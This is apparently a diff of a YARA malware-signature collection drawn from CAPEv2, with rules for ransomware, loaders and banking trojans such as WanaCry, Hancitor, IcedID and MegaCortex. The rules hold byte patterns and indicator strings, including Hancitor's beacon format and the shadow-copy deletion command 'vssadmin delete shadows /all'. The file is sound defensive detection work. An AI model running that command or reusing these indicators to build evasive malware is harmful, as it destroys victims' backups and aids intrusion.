-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "cb103fe5f2d4792e3c612db4e2d84a4c8b0ce0f9a8443e9147e2c345f1dbdff6"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/WanaCry.yar#L1-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "16d5e39f043d27bbf22f8f21e13971b7e0709b07e44746dd157d11ee4cc51944"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "DridexV4 Payload"
+		cape_type = "WanaCry Payload"
 
 	strings:
-		$decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57}
-		$getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3}
-		$getproc64 = {81 FB ?? ?? ?? ?? 75 04 33 C0 EB 2D 8B CB E8 ?? ?? ?? ?? 48 85 C0 75 17 8B CB E8 ?? ?? ?? ?? 84 C0 74 E5 8B CB E8 ?? ?? ?? ?? 48 85 C0 74 D9 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B 5C 24 30 48 83 C4 20 5F C3}
-		$bot_stub_32 = {8B 45 E? 8? [5-13] 8A 1C 0? [6-15] 05 FF 00 00 00 8B ?? F? 39 ?? 89 45 E? 72 D?}
-		$bot_stub_64 = {8B 44 24 ?? 89 C1 89 CA 4C 8B 05 [4] 4C 8B 4C 24 ?? 45 8A 14 11 83 E0 1F 89 C0 41 89 C3 47 2A 14 18 44 88 54 14}
+		$exename = "@WanaDecryptor@.exe"
+		$res = "%08X.res"
+		$pky = "%08X.pky"
+		$eky = "%08X.eky"
+		$taskstart = {8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
 rule CAPE_Trickbot
 {
@@ -62051,8 +62666,8 @@ rule CAPE_Trickbot
 		date = "2023-02-07"
 		modified = "2023-02-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/TrickBot.yar#L1-L20"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/TrickBot.yar#L1-L20"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
 		logic_hash = "47cc2070b43957601a72745329a9d14fb3fbfd4d2b31cacc35d4ac750dde31ea"
 		score = 75
 		quality = 70
@@ -62083,8 +62698,8 @@ rule CAPE_Trickbot_Permadll_UEFI_Module
 		date = "2023-02-07"
 		modified = "2023-02-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/TrickBot.yar#L22-L38"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/TrickBot.yar#L22-L38"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
 		hash = "491115422a6b94dc952982e6914adc39"
 		logic_hash = "564055f56fd19bed8900e6d451ba050b4e9013a9208a3bdc3d3d563567d225d2"
 		score = 75
@@ -62103,138 +62718,248 @@ rule CAPE_Trickbot_Permadll_UEFI_Module
 	condition:
 		6 of them
 }
-rule CAPE_Gandcrab : FILE
+rule CAPE_Hancitor : FILE
 {
 	meta:
-		description = "Gandcrab Payload"
+		description = "Hancitor Payload"
+		author = "threathive"
+		id = "b4e9a26a-db00-5553-acc2-f35148b0ffd5"
+		date = "2020-10-20"
+		modified = "2020-10-20"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Hancitor.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "84003542a2f587b5fbd43731c4240759806f8ee46df2bd96aae4a3c09d97e41c"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		cape_type = "Hancitor Payload"
+
+	strings:
+		$fmt_string = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)"
+		$fmt_string2 = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)"
+		$ipfy = "http://api.ipify.org"
+		$user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and all of them
+}
+rule CAPE_Cargobayloader : FILE
+{
+	meta:
+		description = "CargoBay Loader"
 		author = "kevoreilly"
-		id = "0082e8c9-952e-508c-a438-4e17b8031864"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		id = "5b347863-0bea-55d2-aaf3-b3d6e604be89"
+		date = "2023-02-20"
+		modified = "2023-02-20"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Gandcrab.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "354ed566dbafbe8e9531bb771d9846952eb8c0e70ee94c26d09368159ce4142c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/CargoBayLoader.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "75e975031371741498c5ba310882258c23b39310bd258239277708382bdbee9c"
+		logic_hash = "1d5c4ca79f97e1fac358189a8c6530be12506974fc2fb42f63b0b621536a45c9"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Gandcrab Payload"
+		cape_type = "CargoBay Loader"
 
 	strings:
-		$string1 = "GDCB-DECRYPT.txt" wide
-		$string2 = "GandCrabGandCrabnomoreransom.coinomoreransom.bit"
-		$string3 = "action=result&e_files=%d&e_size=%I64u&e_time=%d&" wide
-		$string4 = "KRAB-DECRYPT.txt" wide
+		$jmp1 = {40 42 0F 00 0F 82 [2] 00 00 48 8D 15 [4] BF 04 00 00 00 41 B8 04 00 00 00 4C 8D [3] 4C 89 F1 E8}
+		$jmp2 = {84 DB 0F 85 [2] 00 00 48 8D 15 [4] 41 BE 03 00 00 00 41 B8 03 00 00 00 4C 8D 7C [2] 4C 89 F9 E8}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $string* )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Sedreco : FILE
+rule CAPE_Ursnif : FILE
 {
 	meta:
-		description = "Sedreco encrypt function entry"
+		description = "Ursnif Payload"
+		author = "kevoreilly & enzo"
+		id = "200c2227-0d34-5e4a-b5aa-ab63a077d141"
+		date = "2019-10-30"
+		modified = "2019-10-30"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/Ursnif.yar#L1-L19"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "46e79fde81ff5352314618021e394b2e0322df07170c7279363290b7134935fd"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		cape_type = "Ursnif Payload"
+
+	strings:
+		$crypto64_1 = {41 8B 02 ?? C1 [0-1] 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D?}
+		$crypto64_2 = {44 01 44 24 10 FF C1 41 8B C0 D1 64 24 10 33 C3 41 8B D8 FF 4C 24 10 41 33 C3 01 44 24 10 D3 C8 01 44 24 10 41 89 02 49 83 C2 04 83 C2 FF 75 C3}
+		$crypto64_3 = {33 C6 ?? C7 [0-1] 49 83 C2 04 33 C3 8B F1 8B CF D3 C8 89 02 48 83 C2 04 41 83 C3 FF 75 ?? 45 85 C9 75 ?? 41 83 E0 03}
+		$crypto64_4 = {41 8B 02 41 8B CB 41 83 F3 01 33 C3 41 8B 1A C1 E1 03 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 C6}
+		$decrypt_config64 = {44 8B D9 33 C0 45 33 C9 44 33 1D ?? ?? ?? 00 ?? ?? D2 ?? ?? D2 74 ?? 4C 8D 42 10 45 3B 0A 73 2? 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12}
+		$crypto32_1 = {01 45 FC D1 65 FC FF 4D FC 33 C1 33 45 0C 01 45 FC 43 8A CB D3 C8 8B CE 01 45 FC 89 02 83 C2 04 FF 4D 08 75 CD}
+		$crypto32_2 = {33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 D9}
+		$decrypt_config32 = {8B ?? 08 5? 33 F? 3B [1-2] 74 14 A1 0? ?? ?? ?? 35 ?? ?? ?? ?? 50 8B D? E8 ?? D? 00 00 EB 02 33 C0 ?B ?? ?? ?? ?? ?? ?? ?? 74 14 8D 4D ?? ?? ?? 50 FF D? 85 C0 74 08}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $decrypt_config64 and any of ( $crypto64* ) ) or ( $decrypt_config32 and any of ( $crypto32* ) )
+}
+rule CAPE_Rokrat : FILE
+{
+	meta:
+		description = "RokRat Payload"
 		author = "kevoreilly"
-		id = "5b9ee4af-50a4-597c-8fa5-f2094c312d23"
+		id = "12e05b90-9771-5901-ae82-9fd2ea6263e7"
 		date = "2022-06-09"
 		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Sedreco.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "f735549606917f59a19157e604e54766e4456bc5d46e94cae3e0a3c18b52a7ca"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/RokRat.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "2aaa7de7ccd59e0da690f4bc0c7deaacf61314d61f8d2aa3ce6f6892f50612ec"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Sedreco Payload"
+		cape_type = "RokRat Payload"
 
 	strings:
-		$encrypt1 = {55 8B EC 83 EC 2C 53 56 8B F2 57 8B 7D 08 B8 AB AA AA AA}
-		$encrypt2 = {55 8B EC 83 EC 20 8B 4D 10 B8 AB AA AA AA}
-		$encrypt64_1 = {48 89 4C 24 08 53 55 56 57 41 54 41 56 48 83 EC 18 45 8D 34 10 48 8B E9 B8 AB AA AA AA 4D 8B E1 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA}
+		$code1 = {8B 57 04 8D 7F 04 33 57 FC 81 E2 FF FF FF 7F 33 57 FC 8B C2 24 01 0F B6 C0 F7 D8 1B C0 D1 EA 25 DF B0 08 99 33 87 30 06 00 00 33 C2 89 87 3C F6 FF FF 83 E9 01 75 C9}
+		$string1 = "/pho_%s_%d.jpg" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt1 or $encrypt2 or $encrypt64_1
+		uint16( 0 ) == 0x5A4D and ( any of ( $code* ) ) and ( any of ( $string* ) )
 }
-rule CAPE_Kovter : FILE
+rule CAPE_Emotetloader : FILE
 {
 	meta:
-		description = "Kovter Payload"
+		description = "Emotet Loader"
 		author = "kevoreilly"
-		id = "3dec3c4b-4678-5ed1-a4c3-c3d9abb58b1c"
+		id = "aea8ff2e-bdf7-5417-a41c-93566d1dd019"
+		date = "2022-05-31"
+		modified = "2022-05-31"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/EmotetLoader.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "410872d25ed3a89a2cba108f952d606cd1c3bf9ccc89ae6ab3377b83665c2773"
+		score = 75
+		quality = 70
+		tags = "FILE"
+		cape_type = "EmotetLoader Payload"
+
+	strings:
+		$antihook = {8B 15 ?? ?? ?? ?? 03 15 ?? ?? ?? ?? 89 95 28 FF FF FF A1 ?? ?? ?? ?? 2D 4D 01 00 00 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B 0D ?? ?? ?? ?? 76 26 8B 95 18 FF FF FF 8B 42 38}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and any of them
+}
+rule CAPE_Tscookie : FILE
+{
+	meta:
+		description = "TSCookie Payload"
+		author = "kevoreilly"
+		id = "e1efd356-7170-5454-bf40-68927c71816c"
 		date = "2019-10-30"
 		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Kovter.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "888fccb8fbfbe6c05ec63bc5658b4743f8e10a96ef51b3868c2ff94afec76f2d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/TSCookie.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "0461c7fd14c74646437654f0a63a4a89d4efad620e197a8ca1e8d390618842c3"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Kovter Payload"
+		cape_type = "TSCookie Payload"
 
 	strings:
-		$a1 = "chkok"
-		$a2 = "k2Tdgo"
-		$a3 = "13_13_13"
-		$a4 = "Win Server 2008 R2"
+		$string1 = "http://%s:%d" wide
+		$string2 = "/Default.aspx" wide
+		$string3 = "\\wship6"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Blackdropper
+rule CAPE_Icedid
 {
 	meta:
-		description = "BlackDropper"
-		author = "enzok"
-		id = "5cb92b67-d12c-5946-84b1-a9fce4a6d242"
-		date = "2024-10-22"
-		modified = "2024-10-22"
+		description = "IcedID Payload"
+		author = "kevoreilly, threathive"
+		id = "439342be-a1e6-5656-8813-5cebb0e88e98"
+		date = "2021-12-16"
+		modified = "2021-12-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/BlackDropper.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		hash = "f8026ae3237bdd885e5fcaceb86bcab4087d8857e50ba472ca79ce44c12bc257"
-		logic_hash = "c7f7bc740d413b479ebe45611ddfc04f7e4f2978516b2882069b2569c7acdf28"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/IcedID.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "e60ccbab7a360020744eba65961156ca3e2ae9cf23671014f913d71c1a96a331"
 		score = 75
-		quality = 70
+		quality = 45
 		tags = ""
-		cape_type = "BlackDropper Payload"
+		cape_type = "IcedID Payload"
 
 	strings:
-		$string1 = "BlackDropperCPP"
-		$string2 = "Builder.dll"
-		$string3 = "\\Builder.exe"
-		$crypt1 = {33 D2 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 F7 F1 48 8B C2 48 8B D0 48 8D 4C 24 ?? E8}
-		$crypt2 = {0F BE 00 8B 4C 24 ?? 33 C8 8B C1 88 44 24 ?? 48 8B 54 24 ?? 48 8D 4C 24}
-		$crypt3 = {E8 [4] 0F B6 4C 24 ?? 88 08 E9}
+		$crypt1 = {8A 04 ?? D1 C? F7 D? D1 C? 81 E? 20 01 00 00 D1 C? F7 D? 81 E? 01 91 00 00 32 C? 88}
+		$crypt2 = {8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3}
+		$crypt3 = {41 00 8B C8 C1 E1 08 0F B6 C4 66 33 C8 66 89 4? 24 A1 ?? ?? 41 00 89 4? 20 A0 ?? ?? 41 00 D0 E8 32 4? 32}
+		$download1 = {8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57}
+		$download2 = {8B 75 ?? 8D 4D ?? 8B 7D ?? 8B D6 57 89 1E 89 1F E8 [4] 59 3D C8 00 00 00 75 05 33 C0 40 EB}
+		$major_ver = {0F B6 05 ?? ?? ?? ?? 6A ?? 6A 72 FF 75 0C 6A 70 50 FF 35 ?? ?? ?? ?? 8D 45 80 FF 35 ?? ?? ?? ?? 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 ?? ?? ?? ?? 83 C4 38 8B E5 5D C3}
+		$stage_2_request_binary = "id="
+		$stage_2_request_img = ".png"
 
 	condition:
-		2 of ( $string* ) or 2 of ( $crypt* )
+		any of ( $crypt* , $download* , $major_ver ) and all of ( $stage_2_request_* )
 }
-rule CAPE_Hancitor : FILE
+rule CAPE_Zeuspanda : FILE
 {
 	meta:
-		description = "Hancitor Payload"
-		author = "threathive"
-		id = "b4e9a26a-db00-5553-acc2-f35148b0ffd5"
-		date = "2020-10-20"
-		modified = "2020-10-20"
+		description = "ZeusPanda Payload"
+		author = "kevoreilly"
+		id = "7891c021-6687-5457-b9e1-0beb0472647c"
+		date = "2022-06-09"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Hancitor.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "84003542a2f587b5fbd43731c4240759806f8ee46df2bd96aae4a3c09d97e41c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/ZeusPanda.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "43d8a56cae9fd23c053f6956851734d3270b46a906236854502c136e3bb1e761"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Hancitor Payload"
+		cape_type = "ZeusPanda Payload"
 
 	strings:
-		$fmt_string = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)"
-		$fmt_string2 = "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)"
-		$ipfy = "http://api.ipify.org"
-		$user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
+		$code1 = {8B 01 57 55 55 55 55 55 55 53 51 FF 50 0C 85 C0 78 E? 55 55 6A 03 6A 03 55 55 6A 0A FF 37}
+		$code2 = {8D 85 B0 FD FF FF 50 68 ?? ?? ?? ?? 8D 85 90 FA FF FF 68 0E 01 00 00 50 E8 ?? ?? ?? ?? 83 C4 10 83 F8 FF 7E ?? 68 04 01 00 00 8D 85 B0 FD FF FF}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
+rule CAPE_Nitrogenloader
+{
+	meta:
+		description = "Nitrogen Loader"
+		author = "enzok"
+		id = "45628576-3fbf-593d-a113-0bbfb12bd808"
+		date = "2024-12-02"
+		modified = "2024-12-02"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/NitrogenLoader.yar#L1-L23"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "24117d6e04bc964c17c08c9918502410890d7ccdc2e9971f2d01f6f0b41d3836"
+		score = 75
+		quality = 70
+		tags = ""
+		cape_type = "NitrogenLoader Loader"
+		hash1 = "7b603d63a23201ff0b6ffa9acdd650df9caa1731837d559d93b3d8ce1d82a962"
+		hash2 = "50c2afd792bfe2966133ee385054eaae1f73b04e013ef3434ef2407f99d7f037"
+
+	strings:
+		$stringaes1 = {63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76 ca 82 c9 7d fa}
+		$stringaes2 = {52 09 6a d5 30 36 a5 38 bf 40 a3 9e 81 f3 d7 fb 7c e3 39 82 9b}
+		$string1 = "BASS_GetEAXParameters"
+		$string2 = "LoadResource"
+		$syscallmakehashes = {48 89 4C 24 ?? 48 89 54 24 ?? 4? 89 44 24 ?? 4? 89 4C 24 ?? 4? 83 EC ?? B? [4] E8 [3] 00}
+		$syscallnumber = {49 89 C3 B? [4] E8 [3] 00}
+		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
+		$decryptstr1 = {33 D2 48 8B 04 24 B? 0C 00 00 00 48 F7 F1 48 8B C2 48 C1 E0 02 0F B6 C8 48 8B 44 24 ?? 48 D3 E8 48 25 AB 00 00 00}
+		$decryptstr2 = {0F BE C0 48 8B 0C 24 48 8B 54 24 ?? 48 03 D1 48 8B CA 0F BE 09 33 C8 8B C1 48 8B 0C 24 48 8B 54 24 ?? 48 03 D1}
+		$decryptrsc1 = {48 8B 8C 24 [4] 0F B6 04 01 89 ?? 24 [1-4] 48 63 4C 24 ?? 33 D2 48 8B C1 48 F7 B4 24 [4] 48 8B C2 48 8B 8C}
+		$decryptrsc2 = {8B ?? 24 [1-4] 33 C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
+
+	condition:
+		( all of ( $string* ) or all of ( $decrypt* ) ) and any of ( $syscall* )
+}
 rule CAPE_Koiloader
 {
 	meta:
@@ -62244,8 +62969,8 @@ rule CAPE_Koiloader
 		date = "2024-10-25"
 		modified = "2024-10-25"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/KoiLoader.yar#L1-L35"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/KoiLoader.yar#L1-L35"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
 		hash = "b462e3235c7578450b2b56a8aff875a3d99d22f6970a01db3ba98f7ecb6b01a0"
 		logic_hash = "264a536632f8f11c904b00c9d2e505b3263c733ad8fbc2ef19c25a5ad58cef90"
 		score = 75
@@ -62280,1736 +63005,1624 @@ rule CAPE_Koiloader
 	condition:
 		$chunk_1
 }
-rule CAPE_Bitpaymer : FILE
+rule CAPE_Blackdropper
 {
 	meta:
-		description = "BitPaymer Payload"
-		author = "kevoreilly"
-		id = "c139b514-a1ba-5d47-8f4d-8e60cddfe2ba"
-		date = "2019-11-27"
-		modified = "2019-11-27"
+		description = "BlackDropper"
+		author = "enzok"
+		id = "5cb92b67-d12c-5946-84b1-a9fce4a6d242"
+		date = "2024-10-22"
+		modified = "2024-10-22"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/BitPaymer.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "6ae0dc9a36da13e483d8d653276b06f59ecc15c95c754c268dcc91b181677c4c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/BlackDropper.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		hash = "f8026ae3237bdd885e5fcaceb86bcab4087d8857e50ba472ca79ce44c12bc257"
+		logic_hash = "c7f7bc740d413b479ebe45611ddfc04f7e4f2978516b2882069b2569c7acdf28"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "BitPaymer Payload"
+		tags = ""
+		cape_type = "BlackDropper Payload"
 
 	strings:
-		$decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57}
-		$antidefender = "TouchMeNot" wide
+		$string1 = "BlackDropperCPP"
+		$string2 = "Builder.dll"
+		$string3 = "\\Builder.exe"
+		$crypt1 = {33 D2 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 F7 F1 48 8B C2 48 8B D0 48 8D 4C 24 ?? E8}
+		$crypt2 = {0F BE 00 8B 4C 24 ?? 33 C8 8B C1 88 44 24 ?? 48 8B 54 24 ?? 48 8D 4C 24}
+		$crypt3 = {E8 [4] 0F B6 4C 24 ?? 88 08 E9}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		2 of ( $string* ) or 2 of ( $crypt* )
 }
-rule CAPE_Squirrelwaffle : FILE
+rule CAPE_Megacortex : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "kevoreilly & R3MRUM"
-		id = "0ae75f24-7a2a-57d3-8c6f-a61ac6cc08e7"
-		date = "2021-10-13"
-		modified = "2021-10-13"
+		description = "MegaCortex Payload"
+		author = "kevoreilly"
+		id = "ea3dd937-2cb1-5b0f-98b8-154aacaf8650"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/SquirrelWaffle.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "5f799333398421d537ec7a87ca94f6cc9cf1e53e55b353036a5132440990e500"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/data/yara/CAPE/MegaCortex.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "5de1d8241260070241c91b97f18feb2a90069e3b158e863e2d9f568799c244e6"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "SquirrelWaffle Payload"
+		cape_type = "MegaCortex Payload"
 
 	strings:
-		$code = {8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39 8D 4D ?? 0F B6 C0 50 6A 01 E8 [4] C6 45}
-		$decode = {F7 75 ?? 83 7D ?? 10 8D 4D ?? 8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39}
+		$str1 = ".megac0rtx" ascii wide
+		$str2 = "vssadmin delete shadows /all" ascii
